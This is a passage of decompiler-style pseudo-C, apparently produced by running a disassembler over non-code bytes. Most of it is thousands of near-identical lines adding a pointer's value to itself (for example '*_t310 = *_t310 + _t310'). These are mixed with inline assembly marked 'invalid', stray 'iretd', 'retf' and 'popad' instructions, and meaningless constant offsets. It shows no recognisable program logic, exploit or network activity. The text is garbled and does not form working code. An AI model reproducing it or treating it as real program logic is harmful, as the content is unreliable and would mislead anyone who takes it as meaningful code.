				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *((intOrPtr*)(_t310 + _t429 + 0x40)) =  *((intOrPtr*)(_t310 + _t429 + 0x40)) + _t439;
				 *_t439 =  *_t439 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t439 =  *_t439 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t449;
				_t311 = _t310 &  *_t310;
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				asm("invalid");
				asm("invalid");
				 *_t311 =  *_t311 + _t311;
				 *_t311 =  *_t311 + _t311;
				_t312 = _t311 + 1;
				 *_t312 =  *_t312 + _t439;
				asm("rol byte [eax], 0x0");
				 *_t312 =  *_t312 + _t312;
				 *((intOrPtr*)(_t312 - 0x3c)) =  *((intOrPtr*)(_t312 - 0x3c)) + _t439;
				asm("daa");
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t312;
				 *_t312 =  *_t312 + _t439;
				_push(ds);
				_t313 = _t312 + 1;
				 *_t439 =  *_t439 + _t313;
				 *_t313 =  *_t313 + _t313;
				_a10 = _a10 + _t429;
				 *_t313 =  *_t313 + _t313;
				 *_t313 =  *_t313 + _t313;
				 *_t313 =  *_t313 + _t439;
				_push(ds);
				_t314 = _t313 + 1;
				 *_t439 =  *_t439 + _t314;
				 *_t314 =  *_t314 + _t314;
				 *_t314 =  *_t314 + _t449;
				_push(ds);
				_t315 = _t314 + 1;
				 *_t315 =  *_t315 + _t315;
				 *_t315 =  *_t315 + _t315;
				 *((intOrPtr*)(_t459 + _t429)) =  *((intOrPtr*)(_t459 + _t429)) + _t439;
				_t316 = _t315 + 1;
				 *_t459 =  *_t459 + _t316;
				 *_t316 =  *_t316 + _t316;
				 *_t316 =  *_t316 + _t449;
				_t317 = _t316 + 1;
				 *_t452 =  *_t452 + _t449;
				 *((intOrPtr*)(_t452 + 0x6c006801)) =  *((intOrPtr*)(_t452 + 0x6c006801)) + _t449;
				 *_t317 =  *_t317 + _t317;
				ds = ds;
				_t318 = _t317 + 1;
				 *((intOrPtr*)(_t449 + 0x40 + _t439 * 8)) =  *((intOrPtr*)(_t449 + 0x40 + _t439 * 8)) + _t449;
				asm("retf 0x40");
				 *_t318 =  *_t318 + _t318;
				 *_t318 =  *_t318 + _t318;
				asm("rcr byte [ebp+0x25], 1");
				_a614203390 = _a614203390 + _t439;
				_t319 = _t318 + 1;
				 *_t319 =  *_t319 + _t319;
				asm("adc [eax], eax");
				_t320 = _t319 ^ 0x00000000;
				 *_t320 =  *_t320 + _t320;
				asm("lodsb");
				_t321 = _t320 & 0x00000040;
				 *_t449 =  *_t449 + _t321;
				 *_t429 =  *_t429 + _t321;
				 *_t321 =  *_t321 + _t321;
				 *_t321 =  *_t321 + _t321;
				 *_t321 =  *_t321 + _t321;
				 *_t321 =  *_t321 + _t321;
				 *((intOrPtr*)(_t452 + _t429 + 0x40)) =  *((intOrPtr*)(_t452 + _t429 + 0x40)) + _t429;
				 *((intOrPtr*)(_t321 - 0x43ffda9f)) =  *((intOrPtr*)(_t321 - 0x43ffda9f)) + _t439;
				_t322 = _t321 & 0x00000040;
				 *_t449 =  *_t449 + _t322;
				 *_t429 =  *_t429 + _t322;
				 *_t322 =  *_t322 + _t322;
				asm("adc [eax], eax");
				 *_t322 =  *_t322 + _t322;
				asm("lodsb");
				_t323 = _t322 & 0x00000040;
				 *_t439 =  *_t439 + _t323;
				 *_t429 =  *_t429 + _t323;
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t323;
				 *_t323 =  *_t323 + _t323;
				ds = _t471;
				_t325 = _t323 + _t429 + 1;
				 *((intOrPtr*)(_t325 + 0x40002561)) =  *((intOrPtr*)(_t325 + 0x40002561)) + _t439;
				_t328 = (_t325 & 0x00010040) +  *(_t325 & 0x00010040) + 1;
				 *0x3c00 =  *0x3c00 + _t439;
				_a64 = _a64 + _t439;
				 *0x300 =  *0x300 + _t328;
				 *_t328 =  *_t328 + _t328;
				 *_t328 =  *_t328 + _t328;
				 *_t328 =  *_t328 + _t328;
				 *_t328 =  *_t328 + _t449;
				_t329 = _t328 + 1;
				 *((intOrPtr*)(_t329 + 0x5c002561)) =  *((intOrPtr*)(_t329 + 0x5c002561)) + _t429;
				_t332 = (_t329 & 0x00050040) +  *(_t329 & 0x00050040) + 1;
				 *_t332 =  *_t332 + _t429;
				 *_t332 =  *_t332 + _t332;
				 *_t332 =  *_t332 + _t332;
				_t334 = (_t332 & 0x00030040) +  *(_t332 & 0x00030040);
				 *_t334 =  &(_t334[ *_t334]);
				 *_t334 =  &(_t334[ *_t334]);
				 *_t334 =  &(_t334[ *_t334]);
				 *_t334 =  &(_t334[ *_t334]);
				 *_t334 =  *_t334 & 0x00000040;
				asm("popad");
				_t336 =  &(_t334[_t439]) & 0x40257400;
				 *_t429 =  *_t429 + _t336;
				 *_t429 =  *_t429 + _t336;
				 *_t336 =  *_t336 + _t336;
				asm("sbb [eax], al");
				_t474 = _t471 + 1;
				 *_t336 =  *_t336 + _t336;
				_a64 = _a64 + _t336;
				 *((intOrPtr*)(_t336 + _t336)) =  *((intOrPtr*)(_t336 + _t336)) + _t336;
				_t337 = _t336 +  *_t336;
				 *_t337 =  *_t337 + _t337;
				 *_t337 =  *_t337 + _t337;
				 *_t337 =  *_t337 + _t337;
				 *_t337 =  *_t337 + _t337;
				asm("clc");
				 *_t337 =  *_t337 & _t337;
				asm("enter 0x2561, 0x0");
				if( *_t337 < 0) {
					L48:
					_v65472 = _v65472 + _t449;
					asm("invalid");
					_t338 = _t337 &  *[es:eax];
				}
				_t409 = _t337 + 1;
				 *((intOrPtr*)(_t409 + _t409)) =  *((intOrPtr*)(_t409 + _t409)) + _t409;
				_t338 = _t409 +  *_t409 + 1;
				 *_t452 =  *_t452 + _t429;
				 *_t338 =  *_t338 + _t439;
				 *_t338 =  *_t338 + _t338;
				asm("invalid");
				 *_t338 =  *_t338 + _t338;
				 *_t338 =  *_t338 + _t338;
				 *_t338 =  *_t338 + _t338;
				 *_t338 =  *_t338 + _t338;
				if( *_t338 >= 0) {
					asm("popad");
					_t337 = _t338 + 0x00000001 + _t429 & 0x40259400;
					goto L48;
				}
				 *((intOrPtr*)(_t429 - 0x57ffbfde)) =  *((intOrPtr*)(_t429 - 0x57ffbfde)) + _t429;
				_t340 = (_t338 &  *_t338) + 1;
				_t450 = _t449 + _t340;
				asm("iretd");
				_t516 = _t515 -  *_t450;
				_t475 = _t474 +  *_t429;
				_t345 = ((_t340 &  *_t340 &  *(_t340 &  *_t340)) + 0x00000001 &  *((_t340 &  *_t340 &  *(_t340 &  *_t340)) + 1)) + 1;
				 *_t345 =  *_t345 + _t450;
				 *_t450 =  *_t450 + 0x44;
				 *((intOrPtr*)(0x44)) =  *((intOrPtr*)(0x44)) + _t429;
				_t353 = ((_t345 &  *_t345) -  *_t429 + 2 &  *((_t345 &  *_t345) -  *_t429 + 2)) + 0x00000001 &  *(((_t345 &  *_t345) -  *_t429 + 2 &  *((_t345 &  *_t345) -  *_t429 + 2)) + 1) &  *(_t429 + _t459);
				if(_t353 != 0) {
					_t406 = _t353 + 1;
					 *0xFFFFFFFFF6004066 =  *((intOrPtr*)(0xfffffffff6004066)) + _t406;
					_t407 = _t406 &  *_t406;
					asm("sbb eax, 0x4023");
					 *_t407 =  *_t407 + _t407;
					 *_t407 =  *_t407 + _t450;
					_push(ds);
					_t408 = _t407 + 1;
					 *((intOrPtr*)(_t408 - 0x7bffbfe3)) =  *((intOrPtr*)(_t408 - 0x7bffbfe3)) + _t450;
					_push(ss);
					_t353 = _t408 + 1;
					 *((intOrPtr*)(_t450 - 0x6fffbfea)) =  *((intOrPtr*)(_t450 - 0x6fffbfea)) + 0x44;
				}
				_push(ss);
				_t354 = _t353 + 1;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *_t354 =  *_t354 + _t354;
				 *((intOrPtr*)(_t354 + 0x1e)) =  *((intOrPtr*)(_t354 + 0x1e)) + _t429;
				_t355 = _t354 + 1;
				 *((intOrPtr*)(_t355 - 0x7bffbfe3)) =  *((intOrPtr*)(_t355 - 0x7bffbfe3)) + _t450;
				_push(ss);
				 *((intOrPtr*)(_t450 - 0x6fffbfea)) =  *((intOrPtr*)(_t450 - 0x6fffbfea)) + 0x44;
				_push(ss);
				_t357 = _t355 + 2;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *_t357 =  *_t357 + _t357;
				 *((intOrPtr*)(_t357 - 0x4fffbfe2)) =  *((intOrPtr*)(_t357 - 0x4fffbfe2)) + _t357;
				asm("sbb eax, 0x16840040");
				 *((intOrPtr*)(_t450 - 0x6fffbfea)) =  *((intOrPtr*)(_t450 - 0x6fffbfea)) + 0x44;
				_push(ss);
				_t359 = _t357 + 2;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *_t359 =  *_t359 + _t359;
				 *((intOrPtr*)(_t359 - 0x4fffbfe2)) =  *((intOrPtr*)(_t359 - 0x4fffbfe2)) + 0x44;
				asm("sbb eax, 0x16840040");
				 *((intOrPtr*)(_t450 - 0x6fffbfea)) =  *((intOrPtr*)(_t450 - 0x6fffbfea)) + 0x44;
				_push(ss);
				_t361 = _t359 + 2;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				 *_t361 =  *_t361 + _t361;
				_push(ds);
				_t363 = _t361 + _t450 + 1;
				 *((intOrPtr*)(_t363 - 0x7bffbfe3)) =  *((intOrPtr*)(_t363 - 0x7bffbfe3)) + _t450;
				_push(ss);
				 *((intOrPtr*)(_t450 - 0x6fffbfea)) =  *((intOrPtr*)(_t450 - 0x6fffbfea)) + 0x44;
				_push(ss);
				_t365 = _t363 + 2;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				 *_t365 =  *_t365 + _t365;
				_push(ds);
				_t367 = _t365 + _t429 + 1;
				 *((intOrPtr*)(_t367 - 0x7bffbfe3)) =  *((intOrPtr*)(_t367 - 0x7bffbfe3)) + _t450;
				_push(ss);
				 *((intOrPtr*)(_t450 - 0x6fffbfea)) =  *((intOrPtr*)(_t450 - 0x6fffbfea)) + 0x44;
				_t369 = _t367 + 2;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t369 =  *_t369 + _t369;
				 *_t450 =  *_t450 + _t369;
				_t370 = _t369 + 1;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
